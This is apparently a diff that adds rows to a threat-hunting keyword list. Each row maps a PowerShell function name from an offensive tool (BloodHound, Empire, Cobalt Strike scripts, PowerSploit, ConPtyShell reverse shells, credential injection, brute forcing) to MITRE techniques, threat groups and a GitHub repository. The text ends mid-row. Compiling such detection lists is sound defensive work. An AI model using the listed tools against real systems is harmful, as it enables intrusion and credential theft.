+"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*InvokeBloodHound*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z"
+"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*Invoke-Bof *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z"
+"*Invoke-Bof.ps1*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z"
+"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*Invoke-BSOD*","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. 
Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","265","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z"
+"*Invoke-BuildAnonymousSMBServer -*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z"
+"*Invoke-BuildAnonymousSMBServer.ps1*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z"
+"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Cats -pwds*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Invoke-Cats.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invokechecklocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-checklocaladminaccess*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - 
T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
